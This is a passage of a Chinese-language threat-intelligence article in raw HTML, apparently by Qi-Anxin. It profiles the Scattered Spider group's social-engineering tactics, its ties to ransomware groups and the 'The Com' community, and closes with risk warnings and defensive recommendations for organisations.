-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">MFA轰炸（MFA Fatigue）：向受害者重复发送多因素认证请求，直至其不堪骚扰而批准</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">语音钓鱼（Vishing）：冒充IT支持人员通过电话获取访问权限</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">SIM交换攻击：成为绕过强认证的标准手段</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">协同阶段：与勒索软件组织合流（2023年至今）</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心监测发现，Scattered Spider与多个勒索软件组织存在合作关系，包括BlackCat/AlphV、Qilin和RansomHub等。这表明该组织已从单纯的数据窃取转向更深层次的入侵服务，为勒索软件攻击提供初始访问通道。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这种协同模式的典型案例包括：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">提供被盗凭证和内网访问权限</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">协助完成横向移动和数据外泄</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">参与赎金谈判过程</span></p></li></ul><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">地缘关联与&#34;The Com&#34;网络犯罪生态</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Scattered Spider作为&#34;The Com&#34;网络犯罪社区的成员，其活动模式反映了这一地下生态的运作特征。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">&#34;The Com&#34;概述</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">&#34;The Com&#34;是一个以英语为主的地下社区，成员通过特定论坛和即时通讯平台进行联络。该社区具有以下特征：</span></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">成员年龄普遍较低，强调&#34;年轻黑客&#34;身份认同</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">采用社工攻击作为主要突破手段</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">重视信息共享和攻击工具流通</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">与传统东欧网络犯罪组织存在明显区别</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">与传统网络犯罪的差异</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">特征</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">Scattered Spider/&#34;The Com&#34;</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">传统东欧网络犯罪组织</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">成员语言</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">英语母语</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">俄语为主</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">组织结构</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">松散社区型</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">层级分明帮派型</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">攻击偏好</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">社工、钓鱼、SIM交换</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">勒索软件、漏洞利用</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">目标选择</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">科技、加密货币</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">金融、医疗</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">基础设施</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Telegram、云服务</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">传统服务器、Tor</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">执法挑战</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Buchanan在西班牙被捕的案例凸显了追踪英语母语网络犯罪分子的复杂性。与东欧犯罪分子通常在俄罗斯等地建立安全庇护所不同，&#34;The Com&#34;成员分布广泛，增加了国际执法协调的难度。然而，美国与西班牙、英国的执法合作最终成功实现引渡，显示了跨国司法协作的有效性。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内关联影响与风险预警</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">尽管Scattered Spider的主要目标为欧美企业，但国内企业和机构也应高度重视以下风险：</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">直接风险</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">跨国科技企业影响<span textstyle="" style="font-weight: normal;">：在华的跨国科技公司（特别是涉及云通信、BPO服务的厂商）可能成为Scattered Spider的攻击跳板</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">加密货币交易所用户<span textstyle="" style="font-weight: normal;">：使用短信验证码认证的国内加密货币用户面临SIM交换攻击风险</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">远程办公基础设施<span textstyle="" style="font-weight: normal;">：使用VPN和SSO的企业员工凭证对攻击者具有高价值</span></span></strong></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">间接风险</span></h3><ol style="overflow-wrap: break-word;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);list-style-type: decimal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">工具扩散<span textstyle="" style="font-weight: normal;">：Scattered Spider使用的钓鱼工具包和Telegram数据通道模式可能被国内威胁行为体模仿</span></span></strong></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">协作网络延伸<span textstyle="" style="font-weight: normal;">：随着该组织与勒索软件组织的关系深化，针对国内企业的勒索攻击可能通过类似模式发起</span></span></strong></li></ol><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">防护建议</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信安全专家建议企业采取以下措施应对此类威胁：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">技术层面：</span></strong></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">禁用基于短信的双因素认证，改用硬件令牌或认证器应用</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">对VPN和SSO登录实施设备绑定和地理限制</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">部署邮件/短信钓鱼检测系统，对可疑链接进行实时阻断</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">建立MFA异常行为监控，识别非工作时间或异常设备的认证请求</span></p></li></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">管理层面：</span></strong></p><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">定期进行社工防范培训，特别是针对钓鱼和SIM交换攻击</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">建立SIM卡安全策略，要求员工为其手机号码启用运营商保护</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span 